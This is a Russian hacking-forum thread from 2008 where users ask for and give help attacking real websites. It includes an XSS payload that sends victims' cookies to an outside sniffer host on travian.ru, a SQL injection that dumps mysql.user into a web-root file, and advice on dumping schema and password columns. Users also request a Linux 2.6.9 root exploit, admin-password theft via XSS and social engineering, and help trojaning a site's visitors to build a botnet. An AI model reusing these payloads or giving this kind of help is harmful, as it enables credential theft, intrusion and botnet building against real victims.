Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Constantine, уже перепробовал все пути вручную и ничего не подходит, как ещё можно найти путь???
     
  2. *DeViL*

    *DeViL* Banned

    Joined:
    27 Nov 2007
    Messages:
    169
    Likes Received:
    56
    Reputations:
    0
    Подскажите какую ни будь статью о добавлении новых сплоитов к связке сплоитов...
     
  3. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    Сразу к делу.
    Проблема с XSS ...
    Вот она:
    Когда я ввожу XSS ...
    а ввожу я его в игру travian.ru он меня перемещат на мой сниффер, но я не знаю , как дать ссылку людям((
    примерно вот:
    Сначала ввожу: ">
    потом no"><script> document.location.href="http://s.netsec.ru/60880.gif?"+encodeURI(document.cookie); </script><


    т.е. там speed.travian.ru/allianz.php и всё..а надо чтоб альянс переминовался по "какой нибудь" ссылке... оч прошу - помогите(((

    Но там пхп ...я в общем то хз ... попробуйте вот тут:
    speed.travian.ru < зарегистрируйтесь , постройте посольство до 3 ЛВЛа... - создайте альянс \и переминуйте его в поле "ally2" ((
    Если можно то ответы в 452277469 ! но сюда тоже зайду!
    Заранее спасибо! :(


    ===т.е. мне надо СРАЗУ ссылку сделать , чтобы она переминовала альянс и выходила на линк :)


    Подробно обьясню в 452277469 ! TU
     
  4. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Кто-небудь знает есть ли прога или скрипт для перебра лимита и сохранении результата??
     
  5. SQL~In[J]ecTi0n

    SQL~In[J]ecTi0n Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    9
    Likes Received:
    11
    Reputations:
    5
    Кому не сложно,киньте эксплойт для Linux 2.6.9 для получения root'a.
     
  6. SQL~In[J]ecTi0n

    SQL~In[J]ecTi0n Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    9
    Likes Received:
    11
    Reputations:
    5
    to На100ящий

    Вот ссылка на оч.хорошую статью,посмотри там: https://forum.antichat.ru/thread49775.html
     
  7. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    to SQL~In[J]ecTi0n
    Читал её уже, хорошая статья, но не выходит!!! /etc/passwd могу прочитать, а httpd.conf найти немогу. Подскажите путь...плз
     
  8. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    SQL Injection Pentesting TooL
     
  9. m0rf

    m0rf New Member

    Joined:
    3 Oct 2007
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, прошу прощения за столь глупый вопрос, просто очень нужна помощь.
    Суть такова, есть сайт на нем я нашел уязвимость XSS, когда вбиваешь в поля логина и пароля, <script>alert('xss')</script> браузер дружелюбнол выкидывает окошечко, всё как надо. Как мне применить эту уязвимость, в своих целях. Мне нужно стыбрить пароль от админки сайта.
     
  10. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    m0rf, соц. инженерия. Берешь любой сниффер, перехватываешь запрос авторизации, потом составляешь xss'ку под сниффер вебовый и впариваешь её админу.

    з.ы. если непонятно написал, стукни в пм или аську - объясню нормально)
     
    1 person likes this.
  11. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    Может ли мне кто небудь объяснить что делать с этим:
    Я понимаю что это версия и названия бызы данных, ну знаю я эти данные но вить пароля у меня нету! зачем эти инекции тогда?и в каких целях их применять?
     
    #1811 xaker-boss, 28 Apr 2008
    Last edited: 28 Apr 2008
  12. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    xaker-boss, инъекция как факт. Если она тебе интересна - раскручиваешь.
     
  13. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    Смысле 'раскручиваешь' ? можно поподробней?
     
  14. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Подскажите кто нибудь:
    Система UNIX.
    В httpd.conf прописано:
    <VirtualHost *>
    ServerAdmin [email protected]
    DocumentRoot /www/htdocs/rail
    ServerName www.site.com
    # ServerAlias 10.7.103.250
    ServerAlias 10.7.100.4
    ErrorLog /var/log/apache/railway.log
    CustomLog /var/log/apache/railway.log common
    </VirtualHost>

    Дальше нужно записать файл в директорию /www/htdocs/rail:
    www.site.com/index=4&number=1'+union+select+1,2,3,convert(текст+using+cp1251)+from+mysql.user+into+outfile+"\\www\\htdocs\\rail\\1.txt"/*

    Вроде записалось, проверяем:
    www.site.com/1.txt и нифига не получилось... Кто скажет почему???
     
  15. .acme

    .acme Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    126
    Likes Received:
    36
    Reputations:
    4
    xaker-boss, Раскручиваешь в этом случае значит "достаешь максимум информации".
    Воспользовать информацией, естественно, можно в любых целях. Начиная от доступа к аккаунтам юзеров на портале(если таковые есть) до заливки шелла.

    Вся "раскрутка" описана ранее в статьях.

    Могу лишь привести банальный пример:

    есть у меня информация типа:

    например мне этот ресурс интересен.
    Зная, что это 5 ветка MSSQL, я могу воспользоваться информацией, находящейся в infromation_schema.columns, а именно имена столбцов и полей.

    Code:
    17:booltxt
    17:--1:text
    18:cities
    18:--1:text
    19:kvbath
    19:--1:text
    20:kvdata
    20:--1:date
    20:--2:user
    20:--3:meta
    20:--4:type
    20:--5:city
    20:--6:strt
    20:--7:stor
    20:--8:high
    20:--9:bath
    20:--10:flor
    20:--11:stat
    20:--12:stot
    20:--13:skit
    20:--14:sliv
    20:--15:dstr
    20:--16:wall
    20:--17:hnum
    20:--18:pric
    20:--19:tele
    20:--20:dscr
    20:--21:cnam
    20:--22:ctel
    20:--23:mail
    20:--24:agen
    21:kvfloor
    21:--1:text
    22:kvmeta
    22:--1:text
    23:kvstate
    23:--1:text
    24:kvtype
    24:--1:text
    25:kvtype1rp
    25:--1:text
    26:kvuser
    26:--1:password
    27:kvwall
    27:--1:text
    Например меня интересуют данные, касающиеся информации о пользователях:

    и получаю что хотел.

    Все чисто для примера.
     
    3 people like this.
  16. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    На100ящий не хватает прав на диру
     
  17. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    интересует такой вопрос...
    вот я имею крупный сервер, посещает его довольно таки много человек...
    можно ли через этот сайт троянить юзеров??(и как)
    цель: поднять ботнет сеть.
     
  18. На100ящий

    На100ящий Elder - Старейшина

    Joined:
    9 Jan 2008
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Права есть 'y', рутовые....
     
  19. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    права над сервером полные!
     
  20. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    На100ящий
    с чего ты взял что рутовые?

    -=megahertz=-
    конечно можно,совсем не давно моя ася так и ушла:),благодарю того человека который ее вернул.)
    ps:вот почитай
    Code:
    http://forum.antichat.ru/thread58732.html
    может пригодится.
     
    #1820 }{0TT@БЬ)Ч, 28 Apr 2008
    Last edited: 28 Apr 2008
    1 person likes this.
Thread Status:
Not open for further replies.